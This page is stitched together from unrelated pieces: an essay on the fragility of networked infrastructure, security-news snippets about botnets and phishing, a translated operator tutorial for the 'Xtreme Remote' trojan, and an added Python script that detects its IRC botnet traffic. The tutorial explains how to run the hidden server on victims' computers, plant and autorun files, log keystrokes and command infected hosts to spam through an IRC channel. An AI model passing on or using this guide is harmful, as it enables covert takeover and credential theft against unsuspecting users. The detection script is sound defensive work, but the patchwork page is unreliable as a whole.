Your juicers? Whatever, we can laugh at that because it seems ludicrous, but it’s not. A typical US city only has three days of food within the city limits, because the Internet has enabled just-in-time delivery of foodstuffs. Economic optimization within a network tends to imply specialization, which means that even those lovely rural communities that in theory grow their own food don’t grow balanced diets locally. And you’re laughing at an Internet connected juicer? Your juicer is already Internet-connected. If that goes down, you don’t get any more juice! It’s just connected in a way you can’t see.

Now that gas stations play video ads on a loop above the station, now that every cash register is replaced with an Internet-connected device, losing Internet means no gas and no groceries. No gas means no trucks delivering the groceries. Especially if we make them into self-driving trucks! We think of critical infrastructure in terms of government-owned or controlled utilities… but the food trucking fleet is “critical infrastructure.” It’s owned by a massive patchwork of private entities, and actually is networked into the air fleet and the shipping fleet as well via databases of shipping container IDs. Wanna paralyze the world economy? Corrupt that ID database.

If you have a “smart wifi lightbulb” that’s critical infrastructure because it can be owned by a botnet and used to attack. Hyperbolic? In a world where we take actual damage when something digital is attacked, any CPU is basically a weapon, and leaving Internet connected CPUs unattended is basically leaving armory doors open.

Take the example of the solar panels on my home. They are similar to the IoT lightbulb, but the point is more pertinent.

The solar system controller phones home in a variety of ways to provide information to me on how it is performing, but also to inform the grid about the power I am generating. Because there is no battery in my home, any excess power beyond my consumption must be fed back to the grid. Should solar panels feed more power into the grid than the grid can actually handle, this power must be offloaded elsewhere — typically California pays neighboring states to take it. If the power utilities failed to do so, the grid would actually explode. Literally. Explode. The result could be a cascading power failure covering several states.

By connecting this solar controller to the Internet, we have actually put a portion of the critical infrastructure of the entire power grid in the cloud where it is vulnerable. Is that the most direct vector of attack? No, of course not. I suspect you can’t actually tell my solar controller to do anything much, it’s pretty stupid as smart devices go. But I have every expectation that someone wants to make direct bidirectional control possible, because it’s “cool.” (Presumably, regulation is stopping them. Yay, regulation. Please don’t let Congress notice your existence).

The only difference between my solar panels and a hydroelectric dam is scale. To the grid, they are all just nodes, with differing power outputs. Yes, you could cut off my panel. You could cut off a hydroelectric plant too. The issue isn’t whether the node in the network is severable. The issue is whether we are increasing the fragility of the system and thereby increasing the likelihood of cascade effects.

Network connecting solar panels opens the possibility of things like malware attacks designed to cause them all to misreport, say… luckily, the electrical grid has redundancies, fuses, switches. Physical lines to sever. We can measure power flows independent of using the Internet. So let’s consider another example.

Our medical systems have terrible Internet security… MRI machines you can connect to with USB that still have “admin:password” to gain root access. That’s horrifying, sure, but that’s not an attack at scale. More frightening: we’re busily uploading all our medical records to the cloud. Take down that cloud, and no patients can be treated, because nobody will know what they have, what meds they are on. Software swallows your insulin pumps and your pacemakers. To kill people, all you need is to hack that database, or simply erase it or block access to it. After all, we don’t tend to realize that in an Internet of Things, humans are just Things too.

As this software monster has encroached on stuff like election systems, the common reaction has been to go back to paper. So let’s consider a less obvious example. We should be going back to paper for our libraries too! We’ve outsourced so much of our knowledge to digital that the amount of knowledge available in analog has dropped notably. There are fewer librarians in fewer libraries with smaller collections than there used to be. If the net goes down, how much reference material is simply not accessible that was thirty years ago? Google Search is “critical cultural infrastructure.” How much redundancy do we actually have? Could a disconnected town actually educate its children?

How critical is Google as a whole? If Google went down for a month, I am pretty sure we would see worldwide economic collapse. How much of the world economy passes through Google hosting? How much of it is in GMail? How much is dependent on Google Search, Google Images, Google Docs? The answer is a LOT. And because financial systems are now also JIT, ten thousand corporate blips where real estate agencies and local car washes and a huge pile of software companies and a gaggle of universities and so on are suddenly 100% unable to function digitally (no payroll! no insurance verification!) would absolutely have ripple effects into their suppliers and their customers, and thence to the worldwide economic market. Because interconnection without redundancy increases odds of cascades.

It’s actually NORMAL for complex systems to go through collapse cascades. It is part of how they grow and develop. We just won’t like it when one happens to us.

In the current economic climate, there’s this romance with the idea of monopoly. VCs like Peter Thiel speak approvingly of not funding anything unless it has a shot at monopoly. Some great achievements of technology probably wouldn’t have happened without the monopolies that are currently enjoyed by most of the big names in tech. The usual arguments against monopolies are generally around how they stifle competition and hurt consumers. Consumers are OK with the tech monopolies because they largely see benefits right now.

But the single biggest downside to these monopolies is actually lack of redundancy. If AWS went down for longer than the brief interval it did a while back, is there even enough capacity elsewhere? I have no idea — probably there is — but what happens when instead of it being a minor inconvenience it’s actually gone? That’s more like losing the hydroelectric dam than losing the solar panel.

We should be thinking now about how we create redundancy, resilience, in all these systems. “The cloud” isn’t it. Big Data isn’t what we need. Small replicated data is.

This is not solely a technological problem. I’ve often wanted to sit down with Mark Zuckerberg and argue with him about Facebook. It is premised on the notion that “connecting everyone” is an unmitigated good. But it’s not, and for the exact same reasons as the above. We don’t have opinions, we share the opinions of those we know. We think and decide things like politics via viral mechanisms — the old school meaning of “meme.” Nodes can be infected, can even be high-profile nodes, and they will have cascading effects on far larger populations. Actors who don’t understand what they’re doing — like say, billionaire political activists — can basically release ideological malware into the population not realizing the cascade effects, because predicting chaotic systems is hard, and by connecting everyone we’re actually intentionally removing the firewalls and the fuses and the airlocks. Attacks on the idea of the value of expertise are like taking down the immune system while giving the patient a cold.

Right now, we’ve got shit in the water supply.

It’s possible the water gets so dirty that no one can drink from it anymore. This would be all of us saying the net is too dangerous to connect to.

It’s possible we all keep guzzling away and all die.

Or maybe we can start getting smart and diversifying our water supply, getting smarter about cross-contamination, drill separate wells and avoid tapping the same water table.

This sort of problem is what birthed modern epidemiology, long ago, when Dr. Snow figured out a cholera epidemic’s source in London. Facebook is like all of us drinking from the same well.

In general, I’ve come to believe that the norm for systems is to interconnect, to form larger networks, and for sub-areas in that network to evolve into specialization. In the process, they lose autonomy. Eventually, they end up as appendages — sometimes vital, sometimes optional — to the larger organism. The larger network is almost certainly more powerful, more likely to survive, capable of greater things. But when it goes, everything in it goes too. Bits and bobs survive, or dissolve back into constituent parts. Anything over-specialized at that point is almost certainly going to perish, to be used as building blocks for a different network.

We’re fine with this when we are the larger network. Paring our fingernails is no big deal, and the fingernails don’t get a vote. When we are in the larger network, though… it’s likely to our individual benefit not to permit it to reach too high a level of interconnection, specialization and sophistication. It simply means we’re each more vulnerable to the failure of some strongly interconnected node way up the line — just like the tendon in our toe is screwed if our nervous system gets shut down.

Anyway. Pay attention to Petya. Think about how much of your life is online. Assume every connected service will some day shutter. Consider your personal strategies, and contemplate the larger scale. I’m not a radical individualist, not by a long shot… not the sort to say we should hoard gold and have self-sufficient farms in our back yards. But I am someone who more than once has built entire complex communities with hundreds of thousands of nodes — technological and human nodes — and watched them fall prey to single points of failure.

This isn’t about cute Internet of Shit jokes anymore. It’s about how gangrene spreads.



          AVG LinkScanner reveals threats before they reach the computer   
Infecting web pages is the latest method used by hackers and spammers to plant malware on computers, with the aim of stealing passwords or making the computers end up in a botnet; to avoid being discovered, they infect a specific
          Know About Zombie Computer Or Botnet Attacked By Zombie Virus   
If you have seen the Hollywood horror movies Zombieland, Resident Evil or Dead Snow, then you have a rough idea of what a zombie is. A zombie is basically a person who was once healthy and has been infected by a virus. According to the movies, they can infect other healthy people or kill them. Scientists create different viruses and zombies […]
          Locky 2? Jaff Ransomware Launched from Necurs Botnet   

Despite WannaCrypt grabbing all the headlines, it is far from being the only ransomware in circulation. A second wave of Jaff ransomware is now being distributed by the stealthy Necurs botnet. Starting on Monday, May 8 (around 9:30 UTC), the Necurs botnet was harnessed to distribute a new Locky-style email campaign with an initial global outbreak of around 20 million emails. Cyren saw and blocked about 50 million Jaff emails in less than 24 hours during a subsequent wave, and on Thursday approximately 65 million Jaff emails were detected and blocked.


          Google Docs Phishing Attack Worms Its Way In   

Repeatedly referred to as “massive,” the Google Docs attack which has been the talk of the security blogosphere and even mainstream media this past week appears to have sent invitation emails to an estimated “less than 0.1%” of Gmail users, according to Google’s own statement, which is not a particularly massive fraction. Although that still could signify over one million users, in terms of sheer volume it’s not a lot compared to billions of ransomware emails being pumped out by a botnet in a single day.


          Krebs Exposed IoT Botnet Mastermind — Think That's the End?   

For several years, cybersecurity professionals have been predicting an impending malware onslaught, originating from Internet of Things (IoT) devices—“smart” everyday household items that can connect to the Internet, such as refrigerators, WiFi routers, DVRs, baby monitors, security cameras, thermostats, and so forth.


          Botnets rising   

The year 2016 was certainly notable for Locky and the rise of ransomware, but these last months our attention has been drawn to a fundamental element of the underlying criminal cyber infrastructure—botnets.


          New Threat Report: Everything you need to know about botnets   

Cyren announces the release of the comprehensive cybersecurity report Botnets: The Clone Army of Cybercrime. This detailed look at a fundamental component of cybercrime infrastructure covers a wide range of botnet-specific topics, ranging from the basics of botnet architecture to in-depth analyses of botnet creation and evasion techniques.


          On Demand Webinar - Botnets: the Clone Armies of Cybercrime   

Last week we hosted a webinar titled "Botnets: The Clone Armies of Cybercrime." Cyren security researchers, Avi Turiel and Geffen Tzur, discussed the history and current state of botnets and shared insights on malicious bot behavior, how to spot it, and what you can do to protect your organization.


          Bitcoin Phishing Targets Users via Google AdWords   

As we have pointed out several times, cybercrime is a business, and running a malware or phishing campaign does require some financial investment by the bad actors. Rental of botnets, purchase of exploit kits, and acquisition of compromised site lists are all expenses that need to be covered by the campaign.

A recent phishing attack detected by CYREN clearly shows this investment, as the attack vector is pay-per-click advertising via Google AdWords.


          Xtreme Remote   



1. Installation
XRemote consists of two parts: XRemote.exe (the controller) and IEXPLORER.exe (the trojan). XRemote is the part you run on your own computer, while IEXPLORER.exe is the part you run on the target computer.

Installing XRemote.exe

* Extract all of Client.zip into a directory of your choice on your computer. Run XRemote.exe.

Installing IEXPLORER.exe

* Extract all of Server.zip into a directory of your choice on the target computer. Run IEXPLORER.exe.
* This server is not visible on the victim's screen.
* Note: the controlling computer and the target computer must be on the same LAN (Local Area Network) or within the same overall network.

2. Connecting to the target computer
Click Show Commands and you will see the full XRemote window. You need to connect to the victim's computer (I assume you have already installed the trojan on the victim's computer and it is running).

A network such as a LAN or wireless LAN has several client computers with different IP addresses. IP addresses within a network are commonly of the form 192.168.0.XX or 10.10.10.XX. If you do not know the victim's IP address for certain, first run a scan from the XRemote Server Scanner menu. Click Start and look at the list of active computers infected by the trojan; the scanner shows the IP addresses of the computers on which the XRemote server is running. Enter the victim's IP address and click Connect to control the target computer from your own. Once your computer has connected to the target, the word "connected" appears in the status column.

3. REMOTE FUNCTIONS AND OPTIONS
3.1 Ghost Remote
The functions below can be controlled on the victim's computer.
- Open CD-ROM – Close CD-ROM: open or close the CD-ROM tray
- Hide Taskbar – Show Taskbar: hide the taskbar, or bring the hidden taskbar back
- Ram Nuker – Stop Ram Nuker: exhaust the RAM, or stop the RAM nuker
- Lock The Mouse – Free The Mouse: lock the mouse, or release it
- Disable Click – Enable Click: disable mouse clicks, or restore them
- Shutdown PC – Reboot PC: shut down or reboot the victim's computer
- Disable Cpanel – Enable Cpanel: block Control Panel, or restore it
- Disable Run Menu – Enable Run Menu: block RUN, or restore it
- Disable Find Menu – Enable Find Menu: block FIND, or restore it
- Ghost Message – Close Message: show a warning on the victim's computer that it is being remote-controlled, or close that message
- Disable Regedit – Enable Regedit: block REGEDIT, or restore it
- Disable TaskMan – Enable TaskMan: block Task Manager, or restore it
- Scr Injection – BlackEnd: inject text into the 3D Text and Marquee screen savers, or black out the Windows menu

3.2 Injection / Remote Execution
Injection / Remote Execution is the menu that holds the functions for pushing files, running programs, creating registry strings and killing processes on the victim's computer.

Planting a file on the victim's computer
Once you have connected to the victim's computer, you can silently send a file to it. First choose the file on your computer (YOUR DRIVE) and set its destination on the victim's computer (REMOTE EXECUTION – PATH:\MYFILE.EXE), e.g. C:\filesaya.exe, then click SEND. You have now sent filesaya.exe to the victim's computer, where it is stored in C:\.

Auto-running the planted file on the victim's computer
Having planted filesaya.exe, you can decide whether it should run every time the victim's computer starts. Click AUTORUN if you want filesaya.exe to be active every time the victim's computer is switched on.

Running a program on the victim's computer
You can run programs, music files, image files or text files on the victim's computer. Fill in the full PATH:\REMOTEFILE.EXE, e.g. C:\filesaya.exe, and click RUN; filesaya.exe is then executed on the victim's computer. To run Winamp remotely on the victim's computer, set the field to C:\programfiles\winamp\winamp.exe.

Killing a process on the victim's computer
You can also kill processes on the victim's computer. Enter the name of the process in the REMOTEFILE.EXE field and click KILL. For example, if the victim's computer is running Microsoft Word and you want to close it remotely, enter WINWORD.exe and execute the KILL command.

Making the victim's computer read out text you send
Making the victim's computer say whatever you like is one of XRemote's extra functions. Just type the words into the field and click the GODSPEAK button, and the victim's computer turns into a chatterbox.

3.3 Keylogger
As the name says, Key = the keys you press on the keyboard, and logger = recorder. A keylogger is "the ability of a program to record every activity the user performs on the keyboard".
When the XRemote trojan server is active, the keylogger is disabled on the victim's computer. You can enable or disable it as you wish.
Click START KEYLOGGER and let the victim work for a while. To see what the victim has typed, click GET LOG FILE and the trojan sends the keylogger record to your computer. Click CLEAR to wipe the log file and STOP KEYLOGGER to disable the keylogger.

The trojan records the following activity:
- Applications the victim runs
- Characters the victim types on the keyboard
3.4. IRC Botnet
IRC Botnet is the function for controlling victim computers through an IRC server.
This function works at scale: you are not limited to controlling a single computer, but can control every XRemote trojan victim in the IRC channel.
To use it, both you and the victim must of course be connected to the Internet. Click BOTNET ON to activate the botnet on the victim's computer. You must also connect to the IRC server: enter a nick of your choice in the field and click CONNECT. Both you and the victim will join #H.A.C.K on irc.dal.net.

Commands:
!IDENT = orders the bots to identify themselves
!CLEAR = deletes the bot's log file
!SPAM = orders the bots to join large channels and spam them
!NOSPAM = orders the bots to leave the large channels
!CNICK = orders the bots to change nick
!MAINROOM = orders the bots to join the affiliate channel

credit: Indonesia Hacker
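The IRC mode above is the classic botnet pattern: every infected host joins one rendezvous channel and waits for "!" commands from the operator. As an added example that is not part of XRemote or the original tutorial, the following Python script shows how a defender would hunt for that pattern in captured IRC traffic: it flags hosts joining the documented channel, any message body that starts with one of the command tokens listed above, and several internal hosts sitting in the same channel (the fan-out that distinguishes a botnet from ordinary IRC use, and which works even when the channel name is unknown). The capture line format, host addresses and nicks are constructed for illustration.

```python
"""Flag XRemote-style IRC botnet activity in captured IRC messages.

Added example for this page; it is not XRemote's own code or part of any
product. The capture format is constructed for illustration: one IRC
message per line, prefixed with the internal host's IP and a direction
marker ('>' = host sent the message, '<' = host received it).
"""
import re
from collections import defaultdict

# Command vocabulary the XRemote controller issues over IRC (from the
# tool's own documentation above).
XREMOTE_COMMANDS = {"!IDENT", "!CLEAR", "!SPAM", "!NOSPAM", "!CNICK", "!MAINROOM"}
# Rendezvous channel named in the same documentation.
C2_CHANNEL = "#H.A.C.K"

# Constructed sample capture (not real traffic).
SAMPLE_CAPTURE = """\
10.10.10.21 > JOIN #H.A.C.K
10.10.10.22 > JOIN #H.A.C.K
10.10.10.23 > :bot3!xr@10.10.10.23 JOIN :#H.A.C.K
10.10.10.21 < :boss!xr@1.2.3.4 PRIVMSG #H.A.C.K :!IDENT
10.10.10.21 > PRIVMSG #H.A.C.K :ident 10.10.10.21 winxp
10.10.10.22 < :boss!xr@1.2.3.4 PRIVMSG #H.A.C.K :!SPAM
10.10.10.50 > JOIN #linux
10.10.10.50 > PRIVMSG #linux :anyone tried the new kernel?
"""

CAPTURE_RE = re.compile(r"^(?P<host>\d{1,3}(?:\.\d{1,3}){3}) (?P<dir>[<>]) (?P<msg>.+)$")
# Client form "JOIN #chan" and server echo ":nick!u@h JOIN :#chan".
JOIN_RE = re.compile(r"^(?::\S+ )?JOIN :?(?P<chan>[#&]\S+)", re.IGNORECASE)
PRIVMSG_RE = re.compile(r"^(?::\S+ )?PRIVMSG (?P<target>\S+) :(?P<text>.*)$", re.IGNORECASE)


def parse_capture_line(line):
    """Split one capture line into (host, direction, raw IRC message), or None."""
    m = CAPTURE_RE.match(line.strip())
    if not m:
        return None
    return m.group("host"), m.group("dir"), m.group("msg")


def analyze(capture, min_fanout=3):
    """Return (alerts, members).

    alerts: one tuple per suspicious event:
      ("known_c2_channel", host, channel)   host joined the documented C2 channel
      ("bot_command", host, command)        host sent/received an XRemote command token
      ("channel_fanout", channel, n_hosts)  >= min_fanout internal hosts share a channel
    members: {channel: set(hosts)} built from JOINs, for follow-up triage.
    """
    alerts = []
    members = defaultdict(set)
    for line in capture.splitlines():
        parsed = parse_capture_line(line)
        if parsed is None:
            continue
        host, _direction, msg = parsed
        join = JOIN_RE.match(msg)
        if join:
            chan = join.group("chan")
            members[chan].add(host)
            if chan.lower() == C2_CHANNEL.lower():
                alerts.append(("known_c2_channel", host, chan))
            continue
        pm = PRIVMSG_RE.match(msg)
        if pm:
            words = pm.group("text").split()
            # Commands are the first word of the message body; compare
            # case-insensitively so "!spam" is caught as well as "!SPAM".
            if words and words[0].upper() in XREMOTE_COMMANDS:
                alerts.append(("bot_command", host, words[0].upper()))
    # Many internal hosts idling in one channel is the fan-out signature of
    # an IRC botnet even when the channel name is not on a blocklist.
    for chan, hosts in members.items():
        if len(hosts) >= min_fanout:
            alerts.append(("channel_fanout", chan, len(hosts)))
    return alerts, dict(members)


if __name__ == "__main__":
    found, _chans = analyze(SAMPLE_CAPTURE)
    for alert in found:
        print(alert)
```

Run against the embedded sample, the script reports the three joins to #H.A.C.K, the !IDENT and !SPAM commands, and the three-host fan-out on that channel, while the host chatting in #linux produces nothing. The bot's own reply ("ident 10.10.10.21 winxp") is deliberately not flagged, since it lacks the "!" prefix; a production rule would add that reply shape as a second indicator.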


          The Evolution of Cybercrime and What It Means for Data Security   
Cybercrime is now an industry unto itself. And, just as any industry evolves, so does the cybercrime industry. This industry is built upon enterprise data. Granted, there is a ready underworld supply chain and market for vulnerabilities, attack kits, botnets, APTs, phishing-as-a-service, ransomware-as-a-service and other evolving tools. Cybercriminals generate significant sums of money by trading […]
          IT Minister Ravi Shankar Prasad asks PSUs to be vigilant while securing India's digital infrastructure   
IT Minister Ravi Shankar Prasad today exhorted state-owned firms to be "vigilant" while securing digital infrastructure even as he emphasized that cyber attacks should not be a deterrent to building information superhighways in India.

His comments come against the backdrop of a global malware attack that has disrupted functioning at some central banks and many large corporations in Europe. In India, the attack has impacted the functioning of one of the terminals of India's largest container port, JNPT.

Likening the information superhighway to a national highway, Prasad said that while accidents may occur on roads at times, it only means that users have to be more cautious."On the national highways there are accidents...you have to drive carefully, wear seat belts, not drink and drive...but how can you say that there should be no national highways because accidents occur. The same is with information highway...," he said.

Proactive measures have already been initiated following the latest attack and the government is keeping a close watch on the entire situation, he said, maintaining that there is no large-scale impact on India yet.

The minister was speaking at the national convention on 'Digitization: Opportunities and Challenges'. Terming cyber security as extremely important, he referred to the Prime Minister having stated that cyber war is like a bloodless war.

"We have got Cyber Swachhta Kendra. If you have any problem, you can approach them immediately...the Cyber Co-ordination Centre is going to be set up very soon," Prasad said listing out the measures taken by the government to secure the IT systems against cyber attacks.

Cyber Swachhta Kendra or the Botnet Cleaning and Malware Analysis Centre, is part of the Digital India initiative and focuses on detection, cleaning and securing systems from botnet infections. "I would like the PSUs (public sector units) to be particularly vigilant in ensuring cyber security in their full digital ecosystem," Prasad said.

He said that audit practices have to be re-assessed in view of the digital transformation unfolding across the country. On digital payments, he said that the BHIM app has been downloaded by two crore people.

"India's digital economy is going to be a great area of growth... A recent BCG Group and Google study said that in five years India's digital payment itself is going to become USD 500 billion industry," he added.

          NYTimes Article on CAPTCHAs   
The New York Times is running an article today on CAPTCHAs. The article really misses some key points. For example, it talks about the CAPTCHAs on YouTube. YouTube's CAPTCHA is really, really bad. The CAPTCHA is mis-designed, using different colors to attempt to provide security. I can't imagine solving this as a color blind user, it must be nearly impossible. Most CAPTCHA providers have migrated to using a monochrome CAPTCHA (for example Google, Yahoo and MSN). The way to create a challenging CAPTCHA today is to make segmentation difficult. This can be achieved without causing as much pain for humans.

Then there's this Asirra thing. Did anybody from the Times actually try it? Here's an unscaled image of what it looks like:

Now, you can hover over an image for a larger version. But now to solve one of these CAPTCHAs, you've got to hover over 12 images, and make a decision on each. Asirra is undeniably cute, but it's not clear that it's all that much easier than the current, well designed, CAPTCHAs. The security of Asirra is also unclear. It'd be interesting to see what happens if Asirra is ever put in front of a high value target (something that can be used to send email, host pagerank-gaining links, or host porn/warez). I have a feeling that some spammer would find a way to abuse a botnet and take advantage of some of the design issues in Asirra.

          Two-Factor Authentication: What it is and Why You Should be Using it Now   

Not too long ago, WordPress sites around the world started getting attacked with automated botnet traffic trying to brute force admin passwords. The other day, the official Twitter account of the Associated Press was hacked. Last year, Wired reporter Mat Honan was hacked when his Amazon account was compromised. That compromise allowed an attacker to …

The post Two-Factor Authentication: What it is and Why You Should be Using it Now appeared first on Technosailor.com.